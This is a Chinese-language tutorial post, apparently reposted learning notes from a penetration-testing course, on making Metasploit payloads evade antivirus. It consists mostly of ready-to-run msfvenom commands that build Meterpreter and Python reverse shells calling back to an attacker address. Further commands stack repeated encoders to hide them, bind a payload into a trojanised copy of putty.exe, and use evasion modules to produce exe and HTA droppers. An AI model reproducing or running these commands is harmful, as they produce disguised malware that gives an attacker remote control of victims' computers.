內網滲透 day10-msfvenom免殺


免殺2-msf免殺

1. 生成shellcode

wps103

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c

2. 生成python腳本

wps104

echo 密文 | base64 -d        base64解密

wps105

msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=5555 -f raw > shell.py

raw 原生的可移植的可執行文件或代碼

3. 自編碼免殺

wps106

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o tt.exe

優秀的編碼模塊:x86/shikata_ga_nai、cmd/powershell_base64

4. 自捆綁免殺(模版注入)

wps108

wps109


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -f exe -o putty.exe

-x 需要的模版

5. 自編碼+自捆綁免殺

wps111


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -e x86/shikata_ga_nai -i 15 -f exe -o putty2.exe

6. msf多重免殺

wps113


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e cmd/powershell_base64 -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 10 -f exe -o 360.exe

7. evasion逃避模塊

search windows/windows

wps115

use 0進入evasion中exe模塊,並顯示需要的參數

wps116

設置相關參數

wps117

run創建文件后將文件移動到/root/下面

wps118


use 1進入evasion中hta模塊

hta:HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件。

wps120



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM